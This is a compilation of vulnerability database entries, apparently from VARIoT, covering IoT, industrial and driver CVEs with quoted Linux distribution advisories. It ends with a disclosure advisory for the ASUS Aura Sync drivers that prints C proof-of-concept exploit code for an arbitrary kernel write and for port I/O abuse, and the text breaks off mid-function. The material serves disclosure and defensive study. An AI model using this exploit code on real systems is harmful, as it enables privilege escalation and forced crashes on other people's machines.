VARIoT IoT vulnerabilities database
| VAR-201812-1197 | CVE-2018-7365 | ZXCLOUD iRAI Vulnerabilities related to untrusted search paths | CVSS V2: 6.5 | CVSS V3: 7.2 | Severity: HIGH |
All versions up to ZXCLOUD iRAI V5.01.05 of the ZTE uSmartView product are impacted by an untrusted search path vulnerability, which may allow an unauthorized user to perform unauthorized operations. ZXCLOUD iRAI contains an untrusted search path vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). ZTE uSmartView is a cloud office desktop from China's ZTE Corporation (ZTE).
| VAR-201812-0371 | CVE-2018-15331 | BIG-IP AAM Permissions vulnerability | CVSS V2: 6.8 | CVSS V3: 7.8 | Severity: HIGH |
On BIG-IP AAM 13.0.0 or 12.1.0-12.1.3.7, the dcdb_convert utility used by BIG-IP AAM fails to drop group permissions when executing helper scripts, which could be used to leverage attacks against the BIG-IP system. BIG-IP AAM contains a permission vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). F5 BIG-IP AAM is an application acceleration manager from the US company F5. A security vulnerability exists in the dcdb_convert utility in F5 BIG-IP AAM versions 13.0.0 and 12.1.0 through 12.1.3.7. At present no further information about this vulnerability is available; please follow CNNVD or vendor announcements.
| VAR-201812-0763 | CVE-2018-20299 | Bosch Smart Home camera Buffer error vulnerability | CVSS V2: 7.5 | CVSS V3: 9.8 | Severity: CRITICAL |
An issue was discovered in several Bosch Smart Home cameras (360 degree indoor camera and Eyes outdoor camera) with firmware before 6.52.4. A malicious client could potentially succeed in the unauthorized execution of code on the device via the network interface, because there is a buffer overflow in the RCP+ parser of the web server.
| VAR-201901-0482 | CVE-2018-17928 | ABB CMS-770 Authentication Bypass Vulnerability | CVSS V2: 3.3 | CVSS V3: 6.5 | Severity: MEDIUM |
The product CMS-770 (Software Versions 1.7.1 and prior) is vulnerable in that an attacker can read sensitive configuration files by bypassing the user authentication mechanism. CMS-770 contains an authentication vulnerability. Information may be obtained. The CMS-770 is a multi-loop monitoring system from ABB for monitoring the branch circuits of electrical systems. An authentication bypass vulnerability exists in ABB CMS-770 1.7.1 and earlier. ABB CMS-770 is prone to an authentication-bypass vulnerability.
ABB CMS-770 versions 1.7.1 and prior are vulnerable.
| VAR-201901-0799 | CVE-2018-16201 | Multiple vulnerabilities in Toshiba Lighting & Technology Corporation Home gateway | CVSS V2: 5.8 | CVSS V3: 8.8 | Severity: High |
Toshiba Home gateway HEM-GW16A 1.2.9 and earlier and Toshiba Home gateway HEM-GW26A 1.2.9 and earlier use hard-coded credentials, which may allow an attacker on the same network segment to log in to the administrator settings screen and change the configuration or execute arbitrary OS commands. Home gateway provided by Toshiba Lighting & Technology Corporation contains multiple vulnerabilities listed below.
* Improper access control (CWE-284) - CVE-2018-16197
* Hidden functionality (CWE-912) - CVE-2018-16198
* Cross-site scripting (CWE-79) - CVE-2018-16199
* OS command injection (CWE-78) - CVE-2018-16200
* Hard-coded credentials (CWE-798) - CVE-2018-16201
The following researchers reported the vulnerabilities to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.
* CVE-2018-16197: Toshitsugu Yoneyama, Yutaka Kokubu, and Daiki Ichinose of Mitsui Bussan Secure Directions, Inc.
* CVE-2018-16198, CVE-2018-16199: Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc.
* CVE-2018-16200, CVE-2018-16201: Yutaka Kokubu of Mitsui Bussan Secure Directions, Inc.
* The information and files stored on the affected device may be accessed. - CVE-2018-16197, CVE-2018-16201
* The affected device may be operated by an attacker. - CVE-2018-16198, CVE-2018-16201
* An arbitrary script may be executed on the user's web browser. - CVE-2018-16199
* An arbitrary OS command may be executed on the affected device. - CVE-2018-16200, CVE-2018-16201
TOSHIBA Home gateway HEM-GW26A and HEM-GW16A are home gateway products of Japan's Toshiba (TOSHIBA) company. The vulnerability is caused by the use of hard-coded credentials in the program. An attacker could exploit this vulnerability to log in to the administrator settings page, change configurations, or execute arbitrary operating system commands.
| VAR-201901-0797 | CVE-2018-16199 | TOSHIBA Home Gateway HEM-GW26A and TOSHIBA Home Gateway HEM-GW16A Cross-Site Scripting Vulnerability | CVSS V2: 5.8 | CVSS V3: 8.8 | Severity: High |
Cross-site scripting vulnerability in Toshiba Home gateway HEM-GW16A 1.2.9 and earlier and Toshiba Home gateway HEM-GW26A 1.2.9 and earlier allows a remote attacker to inject arbitrary web script or HTML via unspecified vectors. Home gateway provided by Toshiba Lighting & Technology Corporation contains multiple vulnerabilities listed below.
* Improper access control (CWE-284) - CVE-2018-16197
* Hidden functionality (CWE-912) - CVE-2018-16198
* Cross-site scripting (CWE-79) - CVE-2018-16199
* OS command injection (CWE-78) - CVE-2018-16200
* Hard-coded credentials (CWE-798) - CVE-2018-16201
The following researchers reported the vulnerabilities to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.
* CVE-2018-16197: Toshitsugu Yoneyama, Yutaka Kokubu, and Daiki Ichinose of Mitsui Bussan Secure Directions, Inc.
* CVE-2018-16198, CVE-2018-16199: Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc.
* CVE-2018-16200, CVE-2018-16201: Yutaka Kokubu of Mitsui Bussan Secure Directions, Inc.
* The information and files stored on the affected device may be accessed. - CVE-2018-16197, CVE-2018-16201
* The affected device may be operated by an attacker. - CVE-2018-16198, CVE-2018-16201
* An arbitrary script may be executed on the user's web browser. - CVE-2018-16199
* An arbitrary OS command may be executed on the affected device. - CVE-2018-16200, CVE-2018-16201
| VAR-201901-0795 | CVE-2018-16197 | TOSHIBA Home Gateway HEM-GW26A and TOSHIBA Home Gateway HEM-GW16A Access Control Error Vulnerability | CVSS V2: 5.8 | CVSS V3: 8.8 | Severity: High |
Toshiba Home gateway HEM-GW16A 1.2.9 and earlier and Toshiba Home gateway HEM-GW26A 1.2.9 and earlier allow an attacker on the same network segment to bypass access restrictions and access the information and files stored on the affected device. Home gateway provided by Toshiba Lighting & Technology Corporation contains multiple vulnerabilities listed below.
* Improper access control (CWE-284) - CVE-2018-16197
* Hidden functionality (CWE-912) - CVE-2018-16198
* Cross-site scripting (CWE-79) - CVE-2018-16199
* OS command injection (CWE-78) - CVE-2018-16200
* Hard-coded credentials (CWE-798) - CVE-2018-16201
The following researchers reported the vulnerabilities to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.
* CVE-2018-16197: Toshitsugu Yoneyama, Yutaka Kokubu, and Daiki Ichinose of Mitsui Bussan Secure Directions, Inc.
* CVE-2018-16198, CVE-2018-16199: Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc.
* CVE-2018-16200, CVE-2018-16201: Yutaka Kokubu of Mitsui Bussan Secure Directions, Inc.
* The information and files stored on the affected device may be accessed. - CVE-2018-16197, CVE-2018-16201
* The affected device may be operated by an attacker. - CVE-2018-16198, CVE-2018-16201
* An arbitrary script may be executed on the user's web browser. - CVE-2018-16199
* An arbitrary OS command may be executed on the affected device. - CVE-2018-16200, CVE-2018-16201
An access control error vulnerability exists in TOSHIBA Home Gateway HEM-GW26A 1.2.9 and earlier and TOSHIBA Home Gateway HEM-GW16A 1.2.9 and earlier.
| VAR-201901-0796 | CVE-2018-16198 | Multiple vulnerabilities in Toshiba Lighting & Technology Corporation Home gateway | CVSS V2: 5.8 | CVSS V3: 8.8 | Severity: High |
Toshiba Home gateway HEM-GW16A 1.2.9 and earlier and Toshiba Home gateway HEM-GW26A 1.2.9 and earlier may allow an attacker on the same network segment to access a non-documented developer screen to perform operations on the affected device. Home gateway provided by Toshiba Lighting & Technology Corporation contains multiple vulnerabilities listed below.
* Improper access control (CWE-284) - CVE-2018-16197
* Hidden functionality (CWE-912) - CVE-2018-16198
* Cross-site scripting (CWE-79) - CVE-2018-16199
* OS command injection (CWE-78) - CVE-2018-16200
* Hard-coded credentials (CWE-798) - CVE-2018-16201
The following researchers reported the vulnerabilities to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.
* CVE-2018-16197: Toshitsugu Yoneyama, Yutaka Kokubu, and Daiki Ichinose of Mitsui Bussan Secure Directions, Inc.
* CVE-2018-16198, CVE-2018-16199: Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc.
* CVE-2018-16200, CVE-2018-16201: Yutaka Kokubu of Mitsui Bussan Secure Directions, Inc.
* The information and files stored on the affected device may be accessed. - CVE-2018-16197, CVE-2018-16201
* The affected device may be operated by an attacker. - CVE-2018-16198, CVE-2018-16201
* An arbitrary script may be executed on the user's web browser. - CVE-2018-16199
* An arbitrary OS command may be executed on the affected device. - CVE-2018-16200, CVE-2018-16201
TOSHIBA Home Gateway HEM-GW26A and TOSHIBA Home Gateway HEM-GW16A are home gateway products of Japan's Toshiba (TOSHIBA) company.
| VAR-201901-0798 | CVE-2018-16200 | TOSHIBA Home Gateway HEM-GW26A and TOSHIBA Home Gateway HEM-GW16A Operating System Command Injection Vulnerability | CVSS V2: 5.8 | CVSS V3: 8.8 | Severity: High |
Toshiba Home gateway HEM-GW16A 1.2.9 and earlier and Toshiba Home gateway HEM-GW26A 1.2.9 and earlier allow an attacker on the same network segment to execute arbitrary OS commands. Home gateway provided by Toshiba Lighting & Technology Corporation contains multiple vulnerabilities listed below.
* Improper access control (CWE-284) - CVE-2018-16197
* Hidden functionality (CWE-912) - CVE-2018-16198
* Cross-site scripting (CWE-79) - CVE-2018-16199
* OS command injection (CWE-78) - CVE-2018-16200
* Hard-coded credentials (CWE-798) - CVE-2018-16201
The following researchers reported the vulnerabilities to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.
* CVE-2018-16197: Toshitsugu Yoneyama, Yutaka Kokubu, and Daiki Ichinose of Mitsui Bussan Secure Directions, Inc.
* CVE-2018-16198, CVE-2018-16199: Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc.
* CVE-2018-16200, CVE-2018-16201: Yutaka Kokubu of Mitsui Bussan Secure Directions, Inc.
* The information and files stored on the affected device may be accessed. - CVE-2018-16197, CVE-2018-16201
* The affected device may be operated by an attacker. - CVE-2018-16198, CVE-2018-16201
* An arbitrary script may be executed on the user's web browser. - CVE-2018-16199
* An arbitrary OS command may be executed on the affected device. - CVE-2018-16200, CVE-2018-16201
An operating system command injection vulnerability exists in TOSHIBA Home Gateway HEM-GW26A 1.2.9 and earlier and TOSHIBA Home Gateway HEM-GW16A 1.2.9 and earlier.
| VAR-201812-0240 | CVE-2018-15465 | Cisco Adaptive Security Appliance Authorization vulnerabilities in software | CVSS V2: 5.5 | CVSS V3: 8.1 | Severity: HIGH |
A vulnerability in the authorization subsystem of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, but unprivileged (levels 0 and 1), remote attacker to perform privileged actions by using the web management interface. The vulnerability is due to improper validation of user privileges when using the web management interface. An attacker could exploit this vulnerability by sending specific HTTP requests via HTTPS to an affected device as an unprivileged user. An exploit could allow the attacker to retrieve files (including the running configuration) from the device or to upload and replace software images on the device.
A remote attacker can exploit this issue to gain elevated privileges on the affected devices.
This issue is tracked by Cisco Bug ID CSCvm53531. The authorization subsystem is one of the authorization subsystems
| VAR-201812-1202 | CVE-2018-20019 | LibVNC Vulnerable to out-of-bounds writing | CVSS V2: 7.5 | CVSS V3: 9.8 | Severity: CRITICAL |
LibVNC before commit a83439b9fbe0f03c48eb94ed05729cb016f8b72f contains multiple heap out-of-bounds write vulnerabilities in VNC client code that can result in remote code execution. LibVNC contains an out-of-bounds write vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). LibVNCServer is prone to multiple heap-based buffer-overflow vulnerabilities.
Attackers can exploit these issues to execute arbitrary code within the context of the user running the affected application. Failed attempts will likely cause a denial-of-service condition.
Versions prior to LibVNCServer 0.9.12 are vulnerable.
For the stable distribution (stretch), these problems have been fixed in
version 0.9.11+dfsg-1.3~deb9u1.
We recommend that you upgrade your libvncserver packages.
For the detailed security status of libvncserver please refer to its
security tracker page at:
https://security-tracker.debian.org/tracker/libvncserver
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201908-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: LibVNCServer: Multiple vulnerabilities
Date: August 09, 2019
Bugs: #659560, #673508
ID: 201908-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in LibVNCServer, the worst of
which could result in the arbitrary execution of code.
Background
==========
LibVNCServer/LibVNCClient are cross-platform C libraries that allow you
to easily implement VNC server or client functionality in your program.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/libvncserver < 0.9.12 >= 0.9.12
Description
===========
Multiple vulnerabilities have been discovered in LibVNCServer. Please
review the CVE identifiers referenced below for details.
Impact
======
Please review the referenced CVE identifiers for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All LibVNCServer users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/libvncserver-0.9.12"
References
==========
[ 1 ] CVE-2018-20019
https://nvd.nist.gov/vuln/detail/CVE-2018-20019
[ 2 ] CVE-2018-20020
https://nvd.nist.gov/vuln/detail/CVE-2018-20020
[ 3 ] CVE-2018-20021
https://nvd.nist.gov/vuln/detail/CVE-2018-20021
[ 4 ] CVE-2018-20022
https://nvd.nist.gov/vuln/detail/CVE-2018-20022
[ 5 ] CVE-2018-20023
https://nvd.nist.gov/vuln/detail/CVE-2018-20023
[ 6 ] CVE-2018-20024
https://nvd.nist.gov/vuln/detail/CVE-2018-20024
[ 7 ] CVE-2018-7225
https://nvd.nist.gov/vuln/detail/CVE-2018-7225
[ 8 ] CVE-2018-7226
https://nvd.nist.gov/vuln/detail/CVE-2018-7226
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201908-05
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2019 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
=========================================================================
Ubuntu Security Notice USN-4587-1
October 20, 2020
italc vulnerabilities
=========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
Summary:
Several security issues were fixed in iTALC.
Software Description:
- italc: didactic tool which allows teachers to view and control computer labs
Details:
Nicolas Ruff discovered that iTALC had buffer overflows, divide-by-zero errors
and didn't check malloc return values. (CVE-2016-9941, CVE-2016-9942)
It was discovered that iTALC had an out-of-bounds write, multiple heap
out-of-bounds writes, an infinite loop, improper initializations, and null
pointer vulnerabilities. (CVE-2018-15127,
CVE-2018-20019, CVE-2018-20020, CVE-2018-20021, CVE-2018-20022, CVE-2018-20023,
CVE-2018-20024, CVE-2018-20748, CVE-2018-20749, CVE-2018-20750, CVE-2018-7225,
CVE-2019-15681)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.04 LTS:
italc-client 1:2.0.2+dfsg1-4ubuntu0.1
italc-master 1:2.0.2+dfsg1-4ubuntu0.1
libitalccore 1:2.0.2+dfsg1-4ubuntu0.1
In general, a standard system update will make all the necessary changes.
References:
https://usn.ubuntu.com/4587-1
CVE-2014-6051, CVE-2014-6052, CVE-2014-6053, CVE-2014-6054,
CVE-2014-6055, CVE-2016-9941, CVE-2016-9942, CVE-2018-15127,
CVE-2018-20019, CVE-2018-20020, CVE-2018-20021, CVE-2018-20022,
CVE-2018-20023, CVE-2018-20024, CVE-2018-20748, CVE-2018-20749,
CVE-2018-20750, CVE-2018-7225, CVE-2019-15681
Package Information:
https://launchpad.net/ubuntu/+source/italc/1:2.0.2+dfsg1-4ubuntu0.1
| VAR-201812-0480 | CVE-2018-18999 | WebAccess/SCADA Input validation vulnerability | CVSS V2: 7.5 | CVSS V3: 7.3 | Severity: HIGH |
WebAccess/SCADA, WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1. Lack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack. WebAccess/SCADA contains an input validation vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Advantech WebAccess/SCADA is a set of browser-based SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment.
A buffer overflow vulnerability exists in Advantech WebAccess/SCADA version 8.3.2 based on the Windows 2008 R2 SP1 platform that could allow an attacker to execute arbitrary code or cause a denial of service in the context of an affected application. Advantech WebAccess/SCADA is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Failed exploit attempts will likely cause denial-of-service conditions.
Advantech WebAccess/SCADA version 8.3.2 is vulnerable.
| VAR-201902-0732 | CVE-2018-20026 | CODESYS V3 Product vulnerabilities | CVSS V2: 5.0 | CVSS V3: 7.5 | Severity: HIGH |
Improper Communication Address Filtering exists in CODESYS V3 products in versions prior to V3.5.14.0. CODESYS V3 products contain an unspecified vulnerability. Information may be obtained. 3S-Smart CODESYS Control for BeagleBone and the other products listed below are programming software for industrial control system development from the German company 3S-Smart Software Solutions.
A security vulnerability exists in several 3S-Smart Software Solutions products, which stems from programs that do not properly restrict communication channels. An attacker could use this vulnerability to impersonate the source of a communication packet. The following products are affected: 3S-Smart CODESYS Control for BeagleBone, CODESYS Control for emPC-A / iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control RTE V3, CODESYS Control RTE V3 (for Beckhoff CX), CODESYS Control Win V3 (part of CODESYS Development System setup), CODESYS Control V3 Runtime System Toolkit, CODESYS V3 Embedded Target Visu Toolkit, CODESYS V3 Remote Target Visu Toolkit, CODESYS V3 Safety SIL2, CODESYS Gateway V3, CODESYS HMI V3, CODESYS OPC Server V3, CODESYS PLCHandler SDK, CODESYS V3 Development System, CODESYS V3 Simulation Runtime (part of CODESYS Development System). 3S-Smart Software CODESYS is prone to the following security vulnerabilities:
1. An insecure random number generator weakness
3. A spoofing vulnerability
An attacker can exploit these vulnerabilities to bypass security restrictions, perform certain unauthorized actions, and insert and display spoofed content. Other attacks are also possible.
| VAR-201902-0731 | CVE-2018-20025 | CODESYS Insufficient Random Value Usage Vulnerability in Products | CVSS V2: 5.0 | CVSS V3: 7.5 | Severity: HIGH |
Use of Insufficiently Random Values exists in CODESYS V3 products in versions prior to V3.5.14.0. The CODESYS products contain an insufficiently random value usage vulnerability. Information may be obtained. 3S-Smart CODESYS Control for BeagleBone and the other products listed below are programming software for industrial control system development from the German company 3S-Smart Software Solutions.
A number of 3S-Smart Software Solutions products have security vulnerabilities that result from programs using values with insufficient randomness. An attacker could use this vulnerability to affect the confidentiality and integrity of the data. The following products are affected: 3S-Smart CODESYS Control for BeagleBone; CODESYS Control for emPC-A / iMX6; CODESYS Control for IOT2000; CODESYS Control for Linux; CODESYS Control for PFC100; CODESYS Control for PFC200; CODESYS Control for Raspberry Pi; CODESYS Control RTE V3; CODESYS Control RTE V3 (for Beckhoff CX); CODESYS Control Win V3 (part of CODESYS Development System setup); CODESYS Control V3 Runtime System Toolkit; CODESYS V3 Embedded Target Visu Toolkit; CODESYS V3 Remote Target Visu Toolkit; CODESYS V3 Safety SIL2; CODESYS Gateway V3; CODESYS HMI V3; CODESYS OPC Server V3; CODESYS PLCHandler SDK; CODESYS V3 Development System; CODESYS V3 Simulation Runtime (part of CODESYS Development System). 3S-Smart Software CODESYS is prone to the following security vulnerabilities:
1. An insecure random number generator weakness
3. A spoofing vulnerability
An attacker can exploit these vulnerabilities to bypass security restrictions, perform certain unauthorized actions, and insert and display spoofed content. Other attacks are also possible.
| VAR-201901-0861 | CVE-2018-18995 | ABB GATE-E1 and GATE-E2 Vulnerabilities related to lack of authentication for critical functions | CVSS V2: 7.5 | CVSS V3: 9.8 | Severity: CRITICAL |
Pluto Safety PLC Gateway Ethernet devices ABB GATE-E1 and GATE-E2, all versions, do not allow authentication to be configured on administrative telnet or web interfaces, which could enable various effect vectors, including conducting device resets, reading or modifying registers, and changing configuration settings such as IP addresses. ABB GATE-E1 and GATE-E2 are vulnerable to a lack of authentication for critical functions. Information may be obtained or altered, and service operation may be disrupted (DoS). ABB GATE-E2 is prone to a cross-site scripting vulnerability and an authentication-bypass vulnerability.
Attackers can exploit these issues to execute arbitrary code in the context of the browser and obtain sensitive information; other attacks may also be possible. Both ABB GATE-E1 and GATE-E2 are Ethernet gateway devices of the Swiss company ABB. A security vulnerability exists in ABB GATE-E1 (EOL 2013) and GATE-E2 (EOL OCT 2018), which stems from the fact that the device does not allow authentication to be configured on the management telnet or web interface. An attacker could exploit this vulnerability to reset the device, read or modify registers, and modify configuration settings such as the IP address.
| VAR-201901-0862 | CVE-2018-18997 | ABB GATE-E1 and GATE-E2 Vulnerable to cross-site scripting | CVSS V2: 4.3 | CVSS V3: 6.1 | Severity: MEDIUM |
Pluto Safety PLC Gateway Ethernet devices in ABB GATE-E1 and GATE-E2, all versions, allow an unauthenticated attacker using the administrative web interface to insert an HTML/Javascript payload into any of the device properties, which may allow an attacker to display/execute the payload in a visitor's browser. ABB GATE-E1 and GATE-E2 contain a cross-site scripting vulnerability. Information may be obtained and information may be altered. ABB GATE-E1 and GATE-E2 are Ethernet gateway devices from ABB, Switzerland. A cross-site scripting vulnerability exists in ABB GATE-E1 (EOL 2013) and GATE-E2 (EOL OCT 2018) that can be exploited by remote attackers to inject HTML/Javascript payloads into arbitrary device properties and have them displayed or executed in a visitor's browser.
Attackers can exploit these issues to execute arbitrary code in the context of the browser and obtain sensitive information; other attacks may also be possible.
| VAR-201812-0059 | CVE-2018-18535 | ASUS Aura Sync Access control vulnerability | CVSS V2: 7.2 | CVSS V3: 7.8 | Severity: HIGH |
The Asusgio low-level driver in ASUS Aura Sync v1.07.22 and earlier exposes functionality to read and write Machine Specific Registers (MSRs). This could be leveraged to execute arbitrary ring-0 code. ASUS Aura Sync contains an access control vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Asus Aura Sync is prone to multiple arbitrary code-execution vulnerabilities.
Successfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application and gain elevated privileges. Failed exploits will result in denial-of-service conditions.
ASUS Aura Sync 1.07.22 is vulnerable; other versions may also be affected.
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/
ASUS Drivers Elevation of Privilege Vulnerabilities
1. Advisory Information
Title: ASUS Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2017-0012
Advisory URL:
http://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities
Date published: 2018-12-18
Date of last update: 2018-12-18
Vendors contacted: Asus
Release mode: User release
2. Vulnerability Information
Class: Exposed IOCTL with Insufficient Access Control [CWE-782],
Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL
with Insufficient Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-18537, CVE-2018-18536, CVE-2018-18535
3. Vulnerability Description
ASUS offers several drivers and utilities [1] in order to give the user
more control over certain settings and functions of the motherboard.
In particular, ASUS Aura Sync takes RGB lighting beyond the checkbox,
combining and controlling the LEDs of all your Aura-enabled products
from a single application to achieve perfect, synchronized harmony. From
motherboards and RGB strips to graphics cards and beyond, Aura Sync
enables a veritable symphony of light for ultimate personalization.
4. Vulnerable Packages
5. Vendor Information, Solutions and Workarounds
The vendor did not provide fixes or workaround information.
6. Credits
These vulnerabilities were discovered and researched by Diego Juarez.
The publication of this advisory was coordinated by Leandro Cuozzo from
SecureAuth Advisories Team.
7. Technical Description / Proof of Concept Code
Aura Sync is ASUS's command software for all their line of recent RGB
lighting enabled devices (motherboards/graphics cards/keyboards/mice/etc).
The main subject of this advisory are two of the device drivers
installed/loaded by the Aura Sync application. From now on addressed as
"Asusgio" and "GLCKIo". Default installation allows non-privileged user
processes (even running at LOW INTEGRITY) to get a HANDLE and issue
IOCTL codes to these drivers.
The following sections describe the problems found.
7.1. Arbitrary ring0 write
[CVE-2018-18537]
There is a path in the processing of IOCTL_GLCKIO_READPORT (0x80102050)
on GLCKIo leading to a write of an arbitrary DWORD to an arbitrary address.
/-----
.text:FFFFF800B09F13FE loc_FFFFF800B09F13FE:
.text:FFFFF800B09F13FE mov rax, [rsp+0C8h+var_38]    ; CONTROLLED VALUE
.text:FFFFF800B09F1406 mov ecx, [rsp+0C8h+var_56]    ; CONTROLLED VALUE
.text:FFFFF800B09F140A mov [rax], ecx                ; Arbitrary DWORD sized write!
.text:FFFFF800B09F140C mov rax, [rsp+0C8h+Irp]
.text:FFFFF800B09F1414 mov qword ptr [rax+38h], 4
.text:FFFFF800B09F141C jmp short loc_FFFFF800B09F142D
-----/
Proof of Concept:
/-----
#include <windows.h>
HANDLE ghDriver = 0;
#define IOCTL_GLCKIO_VMWRITE 0x80102050
typedef struct _STRUCT_GLCKIO_VMWRITE {
WORD unk0;
DWORD unk1_1;
WORD unk1_2;
ULONG64 unk2;
ULONG64 unk3;
ULONG64 unk4;
ULONG64 unk5;
ULONG64 unk6;
} STRUCT_GLCKIO_VMWRITE;
BOOL ArbitraryWriteDWORD(ULONG64 dest, DWORD value)
{
STRUCT_GLCKIO_VMWRITE mystructIn = { 0 };
mystructIn.unk0 = 0xf11;
mystructIn.unk1_1 = value; // value
mystructIn.unk5 = dest; // address
STRUCT_GLCKIO_VMWRITE mystructOut = { 0 };
DWORD returned = 0;
DeviceIoControl(ghDriver, IOCTL_GLCKIO_VMWRITE, (LPVOID)&mystructIn,
sizeof(mystructIn), (LPVOID)&mystructOut, sizeof(mystructOut),
&returned, NULL);
return BOOL(returned);
}
BOOL InitDriver()
{
ghDriver = CreateFile("\\\\.\\GLCKIo", GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to GLCKIo driver - GetLastError:%d\n",
GetLastError());
return FALSE;
}
return TRUE;
}
int _tmain(int argc, _TCHAR* argv[])
{
printf("ASUS Aura Sync PoC (arbitrary ring0 write)\n");
if (!InitDriver()) {
exit(0);
}
printf("press ENTER for instant BSOD\n");
getchar();
ArbitraryWriteDWORD(0, 0xffffffff);
CloseHandle(ghDriver);
return 0;
}
-----/
7.2. Port mapped I/O access
[CVE-2018-18536]
Both GLCKIo and Asusgio expose a functionality to read/write data
from/to IO ports. This could be leveraged in a number of ways to
ultimately run code with elevated privileges.
/-----
// This harmless PoC only reboots the PC, much more sinister stuff
// would also be possible by abusing this functionality.
// Compile for 32bit!!! Asusgio apparently has a bug preventing this
// functionality to work unless IoIs32bitProcess == TRUE. They set rdx
// as a pointer instead of a port number on the in/out instruction...
// and they ONLY do this incorrectly in the x64 process specific code.(!?)
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tchar.h>
// for \\.\glckio
#define IOCTL_GLCKIO_WRITEPORT 0x80102054
#define IOCTL_GLCKIO_READPORT 0x80102050
// for \\.\Asusgio
#define IOCTL_ASIO_PORTREADB 0xA0406400
#define IOCTL_ASIO_PORTWRITEB 0xA040A440
HANDLE ghDriver = 0;
typedef BYTE(*fnPMIOReadB)(WORD port);
typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value);
#pragma pack (push,1)
typedef struct {
    DWORD DriverIndex; // DriverEnum index
    BYTE DeviceName[MAX_PATH];
    fnPMIOReadB pPMIOReadB;
    fnPMIOWriteB pPMIOWriteB;
} AutoConfigStruct;
AutoConfigStruct gConfig = { 0 };
enum DriverEnum {
    ASIO = 1,
    GLCKIO,
};
// Asusgio port I/O request: 4 bytes are sent for a read, 5 for a write
typedef struct _ASIO_PORTIO_STRUCT {
    DWORD port;
    ULONG64 value;
} ASIO_PORTIO_STRUCT;
// GLCKIo port I/O request: all 10 bytes are sent, datalen selects a byte
typedef struct _GLCKIO_PORTIO_STRUCT {
    WORD port;
    DWORD value;
    DWORD datalen;
} GLCKIO_PORTIO_STRUCT;
#pragma pack(pop)
// Expands inside a function that has already declared 'inbuffer';
// the first byte the driver writes back is returned to the caller.
#define IOCTLMACRO(iocontrolcode, size) \
    BYTE outbuffer[0x30] = { 0 }; \
    DWORD returned = 0; \
    DeviceIoControl(ghDriver, iocontrolcode, (LPVOID)&inbuffer, \
        size, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
    return outbuffer[0];

BYTE GLCKIO_PMIOReadB(WORD port)
{
    GLCKIO_PORTIO_STRUCT inbuffer = { port, 0, 1 };
    IOCTLMACRO(IOCTL_GLCKIO_READPORT, 10)
}
BYTE GLCKIO_PMIOWriteB(WORD port, BYTE value)
{
    GLCKIO_PORTIO_STRUCT inbuffer = { port, value, 1 };
    IOCTLMACRO(IOCTL_GLCKIO_WRITEPORT, 10)
}
BYTE ASIO_PMIOReadB(WORD port)
{
    ASIO_PORTIO_STRUCT inbuffer = { port, 0 };
    IOCTLMACRO(IOCTL_ASIO_PORTREADB, 4)
}
BYTE ASIO_PMIOWriteB(WORD port, BYTE value)
{
    ASIO_PORTIO_STRUCT inbuffer = { port, value };
    IOCTLMACRO(IOCTL_ASIO_PORTWRITEB, 5)
}
void Reboot()
{
